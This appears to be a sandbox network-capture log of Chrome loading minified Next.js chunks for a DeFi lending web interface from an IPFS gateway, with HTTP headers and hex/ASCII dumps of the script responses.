                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC1369INData Raw: 70 6c 79 28 74 2c 6e 29 7d 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 6d 65 28 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 31 3b 72 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 72 2b 2b 29 7b 76 61 72 20 74 3d 6e 75 6c 6c 21 3d 61 72 67 75 6d 65 6e 74 73 5b 72 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 72 5d 3a 7b 7d 3b 72 25 32 3f 78 65 28 4f 62 6a 65 63 74 28 74 29 2c 21 30 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 72 29 7b 28 30 2c 6e 2e 5a 29 28 65 2c 72 2c 74 5b 72 5d 29 7d 29 29 3a 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 28 65 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65
                                                                                                                                                                                                                                                  Data Ascii: ply(t,n)}return t}function me(e){for(var r=1;r<arguments.length;r++){var t=null!=arguments[r]?arguments[r]:{};r%2?xe(Object(t),!0).forEach((function(r){(0,n.Z)(e,r,t[r])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDe
                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC1369INData Raw: 76 61 72 20 72 2c 6e 2c 6f 2c 61 2c 69 2c 73 2c 63 2c 75 2c 70 3b 72 65 74 75 72 6e 20 5f 28 29 2e 77 72 61 70 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 3b 3b 29 73 77 69 74 63 68 28 65 2e 70 72 65 76 3d 65 2e 6e 65 78 74 29 7b 63 61 73 65 20 30 3a 69 66 28 65 2e 70 72 65 76 3d 30 2c 21 47 7c 7c 21 71 29 7b 65 2e 6e 65 78 74 3d 32 39 3b 62 72 65 61 6b 7d 69 66 28 72 3d 28 30 2c 48 2e 73 6d 29 28 74 2c 6c 2e 64 65 63 69 6d 61 6c 73 2c 2e 32 35 29 2c 21 4a 7c 7c 21 78 65 29 7b 65 2e 6e 65 78 74 3d 31 35 3b 62 72 65 61 6b 7d 72 65 74 75 72 6e 20 6f 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 44 61 74 65 2e 6e 6f 77 28 29 2f 31 65 33 2b 33 36 30 30 29 2e 74 6f 53 74 72 69 6e 67 28 29 2c 65 2e 6e 65 78 74 3d 37 2c 44 28 7b 75 6e 64 65 72 6c 79 69 6e 67 41
                                                                                                                                                                                                                                                  Data Ascii: var r,n,o,a,i,s,c,u,p;return _().wrap((function(e){for(;;)switch(e.prev=e.next){case 0:if(e.prev=0,!G||!q){e.next=29;break}if(r=(0,H.sm)(t,l.decimals,.25),!J||!xe){e.next=15;break}return o=Math.floor(Date.now()/1e3+3600).toString(),e.next=7,D({underlyingA
                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC1369INData Raw: 6f 6e 28 65 29 7b 66 6f 72 28 3b 3b 29 73 77 69 74 63 68 28 65 2e 70 72 65 76 3d 65 2e 6e 65 78 74 29 7b 63 61 73 65 20 30 3a 72 65 74 75 72 6e 20 65 2e 70 72 65 76 3d 30 2c 5a 28 6d 65 28 6d 65 28 7b 7d 2c 42 29 2c 7b 7d 2c 7b 6c 6f 61 64 69 6e 67 3a 21 30 7d 29 29 2c 65 2e 6e 65 78 74 3d 34 2c 6d 28 29 3b 63 61 73 65 20 34 3a 72 65 74 75 72 6e 20 6f 3d 65 2e 73 65 6e 74 2c 61 3d 53 28 7b 70 6f 6f 6c 52 65 73 65 72 76 65 3a 73 2c 74 61 72 67 65 74 52 65 73 65 72 76 65 3a 6c 2c 63 75 72 72 65 6e 74 52 61 74 65 4d 6f 64 65 3a 76 2c 61 6d 6f 75 6e 74 54 6f 52 65 63 65 69 76 65 3a 28 30 2c 69 65 2e 70 61 72 73 65 55 6e 69 74 73 29 28 74 2c 6c 2e 64 65 63 69 6d 61 6c 73 29 2e 74 6f 53 74 72 69 6e 67 28 29 2c 61 6d 6f 75 6e 74 54 6f 53 77 61 70 3a 28 30 2c 69
                                                                                                                                                                                                                                                  Data Ascii: on(e){for(;;)switch(e.prev=e.next){case 0:return e.prev=0,Z(me(me({},B),{},{loading:!0})),e.next=4,m();case 4:return o=e.sent,a=S({poolReserve:s,targetReserve:l,currentRateMode:v,amountToReceive:(0,ie.parseUnits)(t,l.decimals).toString(),amountToSwap:(0,i


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  24192.168.2.549737209.94.90.24431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC739OUTGET /_next/static/chunks/7828.bc42be26a9e94bb7.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                  Referer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC1359INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:41 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 25421
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreibidvl36h62dev3l2dkc5j6jzlxbnojzph6lths2jcxp2fpi6o7kq"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/7828.bc42be26a9e94bb7.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreibidvl36h62dev3l2dkc5j6jzlxbnojzph6lths2jcxp2fpi6o7kq
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-dc13-10
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 675761
                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 31 31 62 39 39 61 30 66 37 35 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e411b99a0f75-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC1369INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 37 38 32 38 5d 2c 7b 36 32 37 35 33 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 72 2c 6e 29 7b 76 61 72 20 74 3d 6e 28 36 34 38 33 36 29 3b 72 2e 5a 3d 76 6f 69 64 20 30 3b 76 61 72 20 6f 3d 74 28 6e 28 36 34 39 33 38 29 29 2c 69 3d 6e 28 38 35 38 39 33 29 2c 73 3d 28 30 2c 6f 2e 64 65 66 61 75 6c 74 29 28 28 30 2c 69 2e 6a 73 78 29 28 22 70 61 74 68 22 2c 7b 64 3a 22 6d 31 39 2e 37 37 20 37 2e 32 33 2e 30 31 2d 2e 30 31 2d 33 2e 37 32 2d 33 2e 37 32 4c 31 35 20 34 2e 35 36 6c 32 2e 31 31 20 32 2e 31 31 63 2d 2e 39 34 2e 33 36 2d 31 2e 36 31 20 31 2e 32 36
                                                                                                                                                                                                                                                  Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[7828],{62753:function(e,r,n){var t=n(64836);r.Z=void 0;var o=t(n(64938)),i=n(85893),s=(0,o.default)((0,i.jsx)("path",{d:"m19.77 7.23.01-.01-3.72-3.72L15 4.56l2.11 2.11c-.94.36-1.61 1.26
                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC1369INData Raw: 65 78 53 68 72 69 6e 6b 3a 30 2c 66 6f 6e 74 53 69 7a 65 3a 7b 69 6e 68 65 72 69 74 3a 22 69 6e 68 65 72 69 74 22 2c 73 6d 61 6c 6c 3a 65 2e 74 79 70 6f 67 72 61 70 68 79 2e 70 78 54 6f 52 65 6d 28 32 30 29 2c 6d 65 64 69 75 6d 3a 65 2e 74 79 70 6f 67 72 61 70 68 79 2e 70 78 54 6f 52 65 6d 28 32 34 29 2c 6c 61 72 67 65 3a 65 2e 74 79 70 6f 67 72 61 70 68 79 2e 70 78 54 6f 52 65 6d 28 33 36 29 7d 5b 72 2e 66 6f 6e 74 53 69 7a 65 5d 2c 63 6f 6c 6f 72 3a 7b 70 72 69 6d 61 72 79 3a 28 65 2e 76 61 72 73 7c 7c 65 29 2e 70 61 6c 65 74 74 65 2e 70 72 69 6d 61 72 79 2e 6d 61 69 6e 2c 73 65 63 6f 6e 64 61 72 79 3a 28 65 2e 76 61 72 73 7c 7c 65 29 2e 70 61 6c 65 74 74 65 2e 73 65 63 6f 6e 64 61 72 79 2e 6d 61 69 6e 2c 69 6e 66 6f 3a 28 65 2e 76 61 72 73 7c 7c 65 29
                                                                                                                                                                                                                                                  Data Ascii: exShrink:0,fontSize:{inherit:"inherit",small:e.typography.pxToRem(20),medium:e.typography.pxToRem(24),large:e.typography.pxToRem(36)}[r.fontSize],color:{primary:(e.vars||e).palette.primary.main,secondary:(e.vars||e).palette.secondary.main,info:(e.vars||e)
                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC1369INData Raw: 2e 6c 65 6e 67 74 68 2d 31 26 26 65 2e 70 75 73 68 28 69 2e 63 6c 6f 6e 65 45 6c 65 6d 65 6e 74 28 72 2c 7b 6b 65 79 3a 60 73 65 70 61 72 61 74 6f 72 2d 24 7b 6f 7d 60 7d 29 29 2c 65 29 29 2c 5b 5d 29 7d 63 6f 6e 73 74 20 66 3d 28 30 2c 64 2e 5a 50 29 28 22 64 69 76 22 2c 7b 6e 61 6d 65 3a 22 4d 75 69 53 74 61 63 6b 22 2c 73 6c 6f 74 3a 22 52 6f 6f 74 22 2c 6f 76 65 72 72 69 64 65 73 52 65 73 6f 6c 76 65 72 3a 28 65 2c 72 29 3d 3e 5b 72 2e 72 6f 6f 74 5d 7d 29 28 28 28 7b 6f 77 6e 65 72 53 74 61 74 65 3a 65 2c 74 68 65 6d 65 3a 72 7d 29 3d 3e 7b 6c 65 74 20 6e 3d 28 30 2c 6f 2e 5a 29 28 7b 64 69 73 70 6c 61 79 3a 22 66 6c 65 78 22 2c 66 6c 65 78 44 69 72 65 63 74 69 6f 6e 3a 22 63 6f 6c 75 6d 6e 22 7d 2c 28 30 2c 73 2e 6b 39 29 28 7b 74 68 65 6d 65 3a 72
                                                                                                                                                                                                                                                  Data Ascii: .length-1&&e.push(i.cloneElement(r,{key:`separator-${o}`})),e)),[])}const f=(0,d.ZP)("div",{name:"MuiStack",slot:"Root",overridesResolver:(e,r)=>[r.root]})((({ownerState:e,theme:r})=>{let n=(0,o.Z)({display:"flex",flexDirection:"column"},(0,s.k9)({theme:r
                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC1369INData Raw: 28 35 39 34 39 39 29 2c 6f 3d 6e 28 34 37 33 30 29 2c 69 3d 6e 28 34 39 35 30 31 29 2c 73 3d 6e 28 31 32 37 39 29 2c 61 3d 6e 28 36 32 30 39 37 29 2c 63 3d 6e 28 33 30 31 32 30 29 2c 6c 3d 6e 28 32 39 36 33 30 29 2c 64 3d 6e 28 37 35 30 38 34 29 2c 75 3d 6e 28 37 30 37 39 34 29 2c 70 3d 6e 28 34 31 30 32 34 29 2c 6d 3d 6e 28 38 35 38 39 33 29 2c 78 3d 5b 22 76 61 6c 75 65 22 2c 22 6f 6e 49 6e 66 6f 43 6c 69 63 6b 22 2c 22 48 41 4c 49 6e 74 65 67 72 61 74 69 6f 6e 43 6f 6d 70 6f 6e 65 6e 74 22 5d 3b 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 74 3d 4f 62 6a 65 63 74 2e 67 65 74 4f
                                                                                                                                                                                                                                                  Data Ascii: (59499),o=n(4730),i=n(49501),s=n(1279),a=n(62097),c=n(30120),l=n(29630),d=n(75084),u=n(70794),p=n(41024),m=n(85893),x=["value","onInfoClick","HALIntegrationComponent"];function f(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var t=Object.getO
                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC1369INData Raw: 73 78 3a 7b 6d 69 6e 57 69 64 74 68 3a 22 75 6e 73 65 74 22 2c 6d 6c 3a 7b 78 73 3a 30 2c 78 73 6d 3a 32 7d 7d 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 6d 2e 6a 73 78 29 28 69 2e 63 43 2c 7b 69 64 3a 22 52 69 73 6b 20 64 65 74 61 69 6c 73 22 7d 29 7d 29 2c 74 26 26 28 30 2c 6d 2e 6a 73 78 29 28 63 2e 5a 2c 7b 6d 6c 3a 7b 78 73 3a 30 2c 78 73 6d 3a 32 7d 2c 6d 74 3a 7b 78 73 3a 31 2c 78 73 6d 3a 30 7d 2c 63 68 69 6c 64 72 65 6e 3a 74 7d 29 5d 7d 29 7d 7d 2c 31 32 33 34 39 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 72 2c 6e 29 7b 6e 2e 64 28 72 2c 7b 4d 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6a 7d 7d 29 3b 76 61 72 20 74 3d 6e 28 31 32 37 39 29 2c 6f 3d 6e 28 38 30 30 35 39 29 2c 69 3d 6e 28 33 30 31 32 30 29 2c 73 3d 6e 28 32 39 36 33 30 29 2c 61
                                                                                                                                                                                                                                                  Data Ascii: sx:{minWidth:"unset",ml:{xs:0,xsm:2}},children:(0,m.jsx)(i.cC,{id:"Risk details"})}),t&&(0,m.jsx)(c.Z,{ml:{xs:0,xsm:2},mt:{xs:1,xsm:0},children:t})]})}},12349:function(e,r,n){n.d(r,{M:function(){return j}});var t=n(1279),o=n(80059),i=n(30120),s=n(29630),a
                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC1369INData Raw: 5b 28 30 2c 68 2e 6a 73 78 29 28 6d 2e 54 31 2c 7b 73 79 6d 62 6f 6c 3a 65 2e 72 65 77 61 72 64 54 6f 6b 65 6e 53 79 6d 62 6f 6c 2c 73 78 3a 7b 66 6f 6e 74 53 69 7a 65 3a 22 32 30 70 78 22 2c 6d 72 3a 31 7d 7d 29 2c 28 30 2c 68 2e 6a 73 78 29 28 73 2e 5a 2c 7b 76 61 72 69 61 6e 74 3a 6f 2c 63 68 69 6c 64 72 65 6e 3a 65 2e 72 65 77 61 72 64 54 6f 6b 65 6e 53 79 6d 62 6f 6c 7d 29 5d 7d 29 2c 77 69 64 74 68 3a 22 31 30 30 25 22 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 68 2e 6a 73 78 29 28 61 2c 7b 69 6e 63 65 6e 74 69 76 65 41 50 52 3a 65 2e 69 6e 63 65 6e 74 69 76 65 41 50 52 7d 29 7d 2c 65 2e 72 65 77 61 72 64 54 6f 6b 65 6e 41 64 64 72 65 73 73 29 7d 29 29 2c 72 2e 6c 65 6e 67 74 68 3e 31 26 26 28 30 2c 68 2e 6a 73 78 29 28 69 2e 5a 2c 7b 73 78 3a 66 75 6e
                                                                                                                                                                                                                                                  Data Ascii: [(0,h.jsx)(m.T1,{symbol:e.rewardTokenSymbol,sx:{fontSize:"20px",mr:1}}),(0,h.jsx)(s.Z,{variant:o,children:e.rewardTokenSymbol})]}),width:"100%",children:(0,h.jsx)(a,{incentiveAPR:e.incentiveAPR})},e.rewardTokenAddress)})),r.length>1&&(0,h.jsx)(i.Z,{sx:fun
                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC1369INData Raw: 64 65 72 29 2c 62 6f 72 64 65 72 52 61 64 69 75 73 3a 22 34 70 78 22 2c 63 75 72 73 6f 72 3a 22 70 6f 69 6e 74 65 72 22 2c 64 69 73 70 6c 61 79 3a 22 66 6c 65 78 22 2c 61 6c 69 67 6e 49 74 65 6d 73 3a 22 63 65 6e 74 65 72 22 2c 6a 75 73 74 69 66 79 43 6f 6e 74 65 6e 74 3a 22 63 65 6e 74 65 72 22 2c 74 72 61 6e 73 69 74 69 6f 6e 3a 22 6f 70 61 63 69 74 79 20 30 2e 32 73 20 65 61 73 65 22 2c 62 67 63 6f 6c 6f 72 3a 6a 3f 22 61 63 74 69 6f 6e 2e 68 6f 76 65 72 22 3a 22 74 72 61 6e 73 70 61 72 65 6e 74 22 2c 22 26 3a 68 6f 76 65 72 22 3a 7b 62 67 63 6f 6c 6f 72 3a 22 61 63 74 69 6f 6e 2e 68 6f 76 65 72 22 2c 62 6f 72 64 65 72 43 6f 6c 6f 72 3a 22 61 63 74 69 6f 6e 2e 64 69 73 61 62 6c 65 64 22 7d 7d 7d 2c 6f 6e 43 6c 69 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 29
                                                                                                                                                                                                                                                  Data Ascii: der),borderRadius:"4px",cursor:"pointer",display:"flex",alignItems:"center",justifyContent:"center",transition:"opacity 0.2s ease",bgcolor:j?"action.hover":"transparent","&:hover":{bgcolor:"action.hover",borderColor:"action.disabled"}}},onClick:function()
                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC1369INData Raw: 72 20 74 3d 6e 28 35 39 34 39 39 29 2c 6f 3d 6e 28 34 39 35 30 31 29 2c 69 3d 6e 28 33 38 32 36 34 29 2c 73 3d 6e 28 38 31 36 34 35 29 2c 61 3d 6e 28 36 32 30 39 37 29 2c 63 3d 6e 28 33 30 31 32 30 29 2c 6c 3d 6e 28 32 39 36 33 30 29 2c 64 3d 6e 28 36 38 33 34 36 29 2c 75 3d 6e 28 39 37 35 36 33 29 2c 70 3d 6e 28 38 35 38 39 33 29 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 74 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 74 3d 74 2e 66 69 6c 74 65 72 28 28 66 75 6e 63 74 69 6f 6e 28 72 29 7b 72 65 74 75 72 6e 20
                                                                                                                                                                                                                                                  Data Ascii: r t=n(59499),o=n(49501),i=n(38264),s=n(81645),a=n(62097),c=n(30120),l=n(29630),d=n(68346),u=n(97563),p=n(85893);function m(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var t=Object.getOwnPropertySymbols(e);r&&(t=t.filter((function(r){return
                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC1369INData Raw: 65 69 67 68 74 3a 22 30 2e 37 35 72 65 6d 22 7d 2c 63 6f 6c 6f 72 3a 6e 2e 70 61 6c 65 74 74 65 2e 77 61 72 6e 69 6e 67 2e 6d 61 69 6e 7d 2c 72 29 2c 7b 7d 2c 7b 63 68 69 6c 64 72 65 6e 3a 28 30 2c 70 2e 6a 73 78 29 28 6f 2e 63 43 2c 7b 69 64 3a 22 49 73 6f 6c 61 74 65 64 22 7d 29 7d 29 29 2c 28 30 2c 70 2e 6a 73 78 29 28 68 2c 7b 63 6f 6c 6f 72 3a 6e 2e 70 61 6c 65 74 74 65 2e 77 61 72 6e 69 6e 67 2e 6d 61 69 6e 7d 29 5d 7d 29 7d 29 7d 2c 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 28 30 2c 70 2e 6a 73 78 29 28 75 2e 61 2c 7b 74 6f 6f 6c 74 69 70 43 6f 6e 74 65 6e 74 3a 28 30 2c 70 2e 6a 73 78 29 28 79 2c 7b 63 6f 6e 74 65 6e 74 3a 28 30 2c 70 2e 6a 73 78 29 28 6f 2e 63 43 2c 7b 69 64 3a 22 41 73 73 65 74 20 63 61 6e 20 62 65 20 6f 6e 6c 79
                                                                                                                                                                                                                                                  Data Ascii: eight:"0.75rem"},color:n.palette.warning.main},r),{},{children:(0,p.jsx)(o.cC,{id:"Isolated"})})),(0,p.jsx)(h,{color:n.palette.warning.main})]})})},b=function(){return(0,p.jsx)(u.a,{tooltipContent:(0,p.jsx)(y,{content:(0,p.jsx)(o.cC,{id:"Asset can be only


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  25192.168.2.549738209.94.90.24431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC739OUTGET /_next/static/chunks/9189.3b39e44e1e1f285d.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                  Referer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1360INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:42 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 15040
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreidqmpvwz36gxygbrcsopgnb6u6p5k6xlgdsscnxezizjdmxb3kbzi"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/9189.3b39e44e1e1f285d.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreidqmpvwz36gxygbrcsopgnb6u6p5k6xlgdsscnxezizjdmxb3kbzi
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-ny5-04
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 13028476
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 31 33 66 65 37 36 37 63 62 34 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e413fe767cb4-EWR
